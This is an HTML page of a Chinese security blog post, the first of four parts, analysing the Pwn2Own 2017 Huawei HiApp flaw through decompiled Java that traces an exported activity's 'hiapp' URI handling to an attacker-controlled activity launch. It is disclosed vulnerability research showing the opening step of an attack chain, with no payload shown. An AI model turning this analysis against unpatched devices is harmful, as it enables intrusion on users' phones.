<!DOCTYPE html>
<html lang="zh">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="0x01 简介ps:本文从攻击者的角度来分析如何发现Pwn2Own华为手机漏洞，但不代表与漏洞发现者的思路相同，仅供参考。本系列漏洞分析由于涉及大量代码分析，所以拆分为四部分，也比较容易阅读和理解消化。 攻击视频详细可参见Pwn2own Blog 官方公告: http:&#x2F;&#x2F;www.huawei.com&#x2F;en&#x2F;psirt&#x2F;security-advisories&#x2F;huawei-sa-20171120-">
<meta property="og:type" content="article">
<meta property="og:title" content="Pwn2Own华为HiApp漏洞原理与利用分析(上)">
<meta property="og:url" content="http://example.com/2018/10/03/Pwn2Own%E5%8D%8E%E4%B8%BAHiApp%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E4%B8%8E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90-%E4%B8%8A/index.html">
<meta property="og:site_name" content="Tasfa&#39;s World!">
<meta property="og:description" content="0x01 简介ps:本文从攻击者的角度来分析如何发现Pwn2Own华为手机漏洞，但不代表与漏洞发现者的思路相同，仅供参考。本系列漏洞分析由于涉及大量代码分析，所以拆分为四部分，也比较容易阅读和理解消化。 攻击视频详细可参见Pwn2own Blog 官方公告: http:&#x2F;&#x2F;www.huawei.com&#x2F;en&#x2F;psirt&#x2F;security-advisories&#x2F;huawei-sa-20171120-">
<meta property="og:locale">
<meta property="article:published_time" content="2018-10-03T01:49:25.000Z">
<meta property="article:modified_time" content="2021-05-22T13:10:54.206Z">
<meta property="article:author" content="Tasfa">
<meta property="article:tag" content="Android漏洞">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2018/10/03/Pwn2Own%E5%8D%8E%E4%B8%BAHiApp%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E4%B8%8E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90-%E4%B8%8A/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh'
  };
</script>

  <title>Pwn2Own华为HiApp漏洞原理与利用分析(上) | Tasfa's World!</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="Tasfa's World!" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Tasfa's World!</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Try to Debug your heart!</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh">
    <link itemprop="mainEntityOfPage" href="http://example.com/2018/10/03/Pwn2Own%E5%8D%8E%E4%B8%BAHiApp%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E4%B8%8E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90-%E4%B8%8A/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Tasfa">
      <meta itemprop="description" content="AndroidSecurity">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Tasfa's World!">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Pwn2Own华为HiApp漏洞原理与利用分析(上)
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2018-10-03 09:49:25" itemprop="dateCreated datePublished" datetime="2018-10-03T09:49:25+08:00">2018-10-03</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2021-05-22 21:10:54" itemprop="dateModified" datetime="2021-05-22T21:10:54+08:00">2021-05-22</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Android%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">Android安全</span></a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Android%E5%AE%89%E5%85%A8/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" itemprop="url" rel="index"><span itemprop="name">漏洞分析</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="0x01-简介"><a href="#0x01-简介" class="headerlink" title="0x01 简介"></a>0x01 简介</h3><p>ps:本文从攻击者的角度来分析如何发现Pwn2Own华为手机漏洞，但不代表与漏洞发现者的思路相同，仅供参考。本系列漏洞分析由于涉及大量代码分析，所以拆分为四部分，也比较容易阅读和理解消化。</p>
<p>攻击视频详细可参见<a target="_blank" rel="noopener" href="https://www.thezdi.com/blog/2017/11/2/the-results-mobile-pwn2own-2017-day-two">Pwn2own Blog</a></p>
<p>官方公告: <a target="_blank" rel="noopener" href="http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20171120-01-hwreader-en">http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20171120-01-hwreader-en</a></p>
<p>漏洞可直接造成任意目录遍历、删除、任意代码执行等高危操作</p>
<span id="more"></span>


<p>漏洞版本:</p>
<ul>
<li>Huawei Read – 8.0.1.303</li>
<li>HiApp – 7.3.0.305</li>
</ul>
<h3 id="0x01-漏洞分析"><a href="#0x01-漏洞分析" class="headerlink" title="0x01 漏洞分析"></a>0x01 漏洞分析</h3><h4 id="第一部分-HiApp白名单绕过"><a href="#第一部分-HiApp白名单绕过" class="headerlink" title="第一部分 HiApp白名单绕过"></a>第一部分 HiApp白名单绕过</h4><p>首先找到切入点，即AndroidManifest.xml中，审计发现有一个Activity暴露了出来(默认exported = true),依此作为切入点，进入到<br><code>com.huawei.appmarket.service.externalapi.view.ThirdApiActivity</code> 中查看源代码进行分析。</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">activity</span> <span class="attr">android:configChanges</span>=<span class="string">&quot;orientation|screenSize&quot;</span> <span class="attr">android:launchMode</span>=<span class="string">&quot;singleTop&quot;</span> <span class="attr">android:name</span>=<span class="string">&quot;com.huawei.appmarket.service.externalapi.view.ThirdApiActivity&quot;</span> <span class="attr">android:theme</span>=<span class="string">&quot;@style/loading_activity_style&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">intent-filter</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">action</span> <span class="attr">android:name</span>=<span class="string">&quot;android.intent.action.VIEW&quot;</span> /&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">category</span> <span class="attr">android:name</span>=<span class="string">&quot;android.intent.category.DEFAULT&quot;</span> /&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">category</span> <span class="attr">android:name</span>=<span class="string">&quot;android.intent.category.BROWSABLE&quot;</span> /&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">data</span> <span class="attr">android:host</span>=<span class="string">&quot;details&quot;</span> <span class="attr">android:scheme</span>=<span class="string">&quot;appmarket&quot;</span> /&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">data</span> <span class="attr">android:host</span>=<span class="string">&quot;search&quot;</span> <span class="attr">android:scheme</span>=<span class="string">&quot;market&quot;</span> /&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">data</span> <span class="attr">android:host</span>=<span class="string">&quot;a.vmall.com&quot;</span> <span class="attr">android:scheme</span>=<span class="string">&quot;https&quot;</span> /&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">data</span> <span class="attr">android:host</span>=<span class="string">&quot;com.huawei.appmarket&quot;</span> <span class="attr">android:scheme</span>=<span class="string">&quot;hiapp&quot;</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">intent-filter</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>切入<code>ThirdApiActivity.java</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title">onCreate</span><span class="params">(Bundle arg2)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">this</span>.setTitle();</span><br><span class="line">    <span class="keyword">this</span>.protocolPolicy = DefaultProtocolPolicy.getProtocolPolicy();</span><br><span class="line">    <span class="keyword">this</span>.protocolPolicy.onCreate(<span class="keyword">this</span>, arg2);  <span class="comment">// 初始化了protocolPolicy</span></span><br><span class="line">    <span class="keyword">super</span>.onCreate(arg2);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">onCreateContinue</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="keyword">this</span>.action = ExternalActionController.getAction(((CallBack)<span class="keyword">this</span>));  <span class="comment">// 初始化action</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">this</span>.action == <span class="keyword">null</span>) &#123;</span><br><span class="line">        <span class="keyword">this</span>.finish();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">this</span>.protocolPolicy.check(<span class="keyword">this</span>, <span class="keyword">this</span>.action.useCacheProtocol()); <span class="comment">//切入关键点</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>接着进入check函数进行查看，可以看到经过函数**l.a()**检查后，回调onAgree函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">check</span><span class="params">(ThirdApiActivity mThirdApiActivity, <span class="keyword">boolean</span> flag)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(!l.a()) &#123;</span><br><span class="line">            mThirdApiActivity.onShow();</span><br><span class="line">            l.a(mThirdApiActivity.getActivity(), <span class="keyword">new</span> ProtocolResultHandler(((IProtocolCheck)mThirdApiActivity)));</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">            mThirdApiActivity.onAgree();</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>而后onAgree函数调用了this.action的onAction函数。那么我们的目标就是需要追踪到对应action类的onAction函数再分析其逻辑，方法是先查看上述getAction函数，找出对应action的类。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> IExternalAction <span class="title">getAction</span><span class="params">(CallBack callBack)</span> </span>&#123;</span><br><span class="line">        ... <span class="comment">//代表省略一些无关代码，简化阅读</span></span><br><span class="line">        Intent intent = callBack.getIntent();</span><br><span class="line">        ...</span><br><span class="line">        String action = intent.getAction();</span><br><span class="line">        <span class="keyword">if</span>(TextUtils.isEmpty(((CharSequence)action))) &#123;</span><br><span class="line">            action = <span class="string">&quot;com.huawei.appmarket.ext.public&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        Object clazz = ExternalActionController.ACTIVITY_MAPS.get(action);<span class="comment">//关键在这里获取到Action对应的Class，也即由ACTIVITY_MAPS中获取</span></span><br><span class="line">        ...</span><br><span class="line">        clazz = ((Class)clazz).getConstructor(CallBack.class).newInstance(callBack);</span><br><span class="line">        <span class="keyword">return</span> clazz;</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure>

<p>那么接下来的思路就是获取ACTIVITY_MAPS的内容，首先自然需要找到put值的地方，然后通过寻找引用就能找到赋值的地方。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">register</span><span class="params">(String arg1, Class arg2)</span> </span>&#123;</span><br><span class="line">        ExternalActionController.ACTIVITY_MAPS.put(arg1, arg2);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>通过查找register函数的引用,即可查找到init函数调用该函数进行注册，具体有两处，如下代码。可以看到，响应<strong>android.intent.action.VIEW</strong>这个Action的类有两个，分别是ViewAction.class和<br>AppViewAction.class,实际上二者为子父类关系。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">init</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.ext.public&quot;</span>, ExtPublicAction.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.intent.action.AppDetail&quot;</span>, AppDetailAction.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.appmarket.intent.action.AppDetail.withapp&quot;</span>, AppDetailAction.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.appmarket.intent.action.AppDetail.withid&quot;</span>, AppDetailAction.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.appmarket.intent.action.AppDetail.withURL&quot;</span>, AppDetailAction.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.appmarket.intent.action.AppDetail.withdetailId&quot;</span>, AppDetailAction.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;android.intent.action.VIEW&quot;</span>, ViewAction.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.service.externalapi.actions.AppUninstallAction&quot;</span>, AppUninstallAction.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.intent.action.PROTOCOL&quot;</span>, ProtocolAction.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.intent.action.LOGIN&quot;</span>, LoginAction.class);</span><br><span class="line">        ExternalActionController.register(ActionName.BATCH_UPDATE_ACTION, BatchUpdateAction.class);</span><br><span class="line">        ExternalActionController.register(ActionName.UPDATE_APP_ACTION, UpdateAppAction.class);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">init</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.appmarket.intent.action.appmovemanager&quot;</span>, AppMoveAction.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.emui.barcode.result&quot;</span>, EMUIBarCodeAction.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.service.appmgr.apkmanagement.activity.apkmanagement&quot;</span>, ApkManagerAction.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.intent.action.launcher.downloadmanager&quot;</span>, LauncherManagerApp.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.appmarket.intent.action.appmanager&quot;</span>, AppUpdateAction.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.appmarket.intent.action.SearchActivity&quot;</span>, SearchAction.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.service.externalapi.actions.PayZoneAction&quot;</span>, PayZoneAction.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;android.intent.action.VIEW&quot;</span>, AppViewAction.class);</span><br><span class="line">        ExternalActionController.register(<span class="string">&quot;com.huawei.appmarket.intent.action.ThirdUpdateAction&quot;</span>, ThirdAppUpdateAction.class);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>通过上面我们知道响应<strong>android.intent.action.VIEW</strong>这个Action的类为ViewAction.class,也即是调用了ViewAction.onAction。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">onAction</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        Intent intent = <span class="keyword">this</span>.callback.getIntent();</span><br><span class="line">        uri = intent.getData();</span><br><span class="line">        ...</span><br><span class="line">       </span><br><span class="line">        String scheme = uri.getScheme();</span><br><span class="line">        String host = uri.getHost();</span><br><span class="line">        ... </span><br><span class="line">        <span class="keyword">this</span>.handlerUri(uri, scheme, host);  <span class="comment">// 注意这里实际上是调用AppViewAction.handlerUri处理自定义的url</span></span><br><span class="line">        ...</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>到这里，实际就快要接近我们的目标，处理自定义scheme的地方。下面是关键的handlerUri函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title">handlerUri</span><span class="params">(Uri uri, String scheme, String host)</span> </span>&#123;  <span class="comment">// 处理hiapp协议</span></span><br><span class="line">        <span class="keyword">if</span>((<span class="string">&quot;https&quot;</span>.equals(scheme)) &amp;&amp; (<span class="string">&quot;a.vmall.com&quot;</span>.equals(host))) &#123;</span><br><span class="line">            <span class="keyword">this</span>.openActivityByUrl(uri);</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>((<span class="string">&quot;hiapp&quot;</span>.equals(scheme)) &amp;&amp; (<span class="string">&quot;com.huawei.appmarket&quot;</span>.equals(host))) &#123;</span><br><span class="line">            String activityName = uri.getQueryParameter(<span class="string">&quot;activityName&quot;</span>);</span><br><span class="line">            String params = uri.getQueryParameter(<span class="string">&quot;params&quot;</span>);</span><br><span class="line">            String channelId = uri.getQueryParameter(<span class="string">&quot;channelId&quot;</span>);</span><br><span class="line">            <span class="keyword">if</span>(!TextUtils.isEmpty(((CharSequence)activityName))) &#123;</span><br><span class="line">                JSONArray jsonArry = <span class="keyword">null</span>;</span><br><span class="line">                <span class="keyword">try</span> &#123;</span><br><span class="line">                    <span class="keyword">if</span>(!TextUtils.isEmpty(((CharSequence)params))) &#123;</span><br><span class="line">                        jsonArry = <span class="keyword">new</span> JSONObject(params).getJSONArray(<span class="string">&quot;params&quot;</span>);</span><br><span class="line">                    &#125;</span><br><span class="line"></span><br><span class="line">                    e.a().c(channelId);</span><br><span class="line">                    a.c(<span class="string">&quot;AppViewAction&quot;</span>, <span class="string">&quot;open hiapp:&quot;</span> + activityName);</span><br><span class="line">                    com.huawei.appmarket.service.activitydispatcher.OpenGateway$b classB = OpenGateway.a(activityName, jsonArry);<span class="comment">//这里注意一个点，传进去的第二参数是jsonArry,该调用链里进行处理成Param类,第三阶段构造参数的时候会讲到。</span></span><br><span class="line">                    <span class="keyword">if</span>(classB == <span class="keyword">null</span>) &#123;</span><br><span class="line">                        goto label_47;</span><br><span class="line">                    &#125;</span><br><span class="line"></span><br><span class="line">                    <span class="keyword">if</span>(classB.getClassI() != <span class="keyword">null</span>) &#123;</span><br><span class="line">                        <span class="keyword">this</span>.callback.startActivity(classB.getClassI(), <span class="number">0</span>);  <span class="comment">// 启动对应的Activity</span></span><br><span class="line">                        goto label_47;</span><br><span class="line">                    &#125;</span><br><span class="line"></span><br><span class="line">                    <span class="keyword">if</span>(classB.getIntent() != <span class="keyword">null</span>) &#123;</span><br><span class="line">                        <span class="keyword">this</span>.callback.startActivity(classB.getIntent());  <span class="comment">// 启动对应的Activity</span></span><br><span class="line">                        goto label_47;</span><br><span class="line">                    &#125;</span><br><span class="line"></span><br><span class="line">                    a.e(<span class="string">&quot;AppViewAction&quot;</span>, <span class="string">&quot;can not start target activity.Go MainActivity&quot;</span>);</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">catch</span>(JSONException v0_1) &#123;</span><br><span class="line">                    a.e(<span class="string">&quot;AppViewAction&quot;</span>, <span class="string">&quot;can not get params:&quot;</span> + v0_1.toString());</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span> &#123;</span><br><span class="line">                a.e(<span class="string">&quot;AppViewAction&quot;</span>, <span class="string">&quot;can not find activityName.&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        label_47:</span><br><span class="line">            <span class="keyword">this</span>.callback.finish();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>那么现在的问题是，调用了startActivity去启动，activityName是怎么控制的，启动的又是哪个具体的Activity，换言之，我们可以控制去启动什么Activity。<br>由上面代码可知，关键点为:<strong>com.huawei.appmarket.service.activitydispatcher.OpenGateway$b classB = OpenGateway.a(activityName, jsonArry)</strong><br>也即此处的classB就是我们可以控制启动的Activity</p>
<p>跟进这个函数，往下跟可以看到：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">OpenGateway.class</span><br><span class="line"><span class="keyword">int</span> index = activityName.indexOf(<span class="number">124</span>); <span class="comment">// ascii码124是: |</span></span><br><span class="line">        <span class="keyword">if</span>(index != -<span class="number">1</span>) &#123;</span><br><span class="line">            Class Claazz = OpenGateway.getFromMap(activityName.substring(<span class="number">0</span>, index));  <span class="comment">// 从可以启动的ActivityMap中取出activityName对应的class</span></span><br><span class="line">            <span class="keyword">if</span>(Claazz != <span class="keyword">null</span>) &#123;</span><br><span class="line">                String v0_1 = <span class="string">&quot;&quot;</span>;</span><br><span class="line">                String activityNameValue = activityName.length() &gt;= index + <span class="number">1</span> ? activityName.substring(index + <span class="number">1</span>) : v0_1;</span><br><span class="line">                <span class="keyword">try</span> &#123;</span><br><span class="line">                    <span class="keyword">return</span> Claazz.newInstance().a(activityNameValue, paramLst);<span class="comment">//关键的调用方法，也是我们接下来解析的重点</span></span><br><span class="line">                &#125;</span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">static</span> Class <span class="title">getFromMap</span><span class="params">(String arg1)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> OpenGateway.ACTIVITYMAP.get(arg1);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>思路一样，我们先找到put值的地方。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">OpenGateway.class</span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">a</span><span class="params">(String arg1, Class arg2)</span> </span>&#123;</span><br><span class="line">        OpenGateway.ACTIVITYMAP.put(arg1, arg2);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>查看该函数的引用</p>
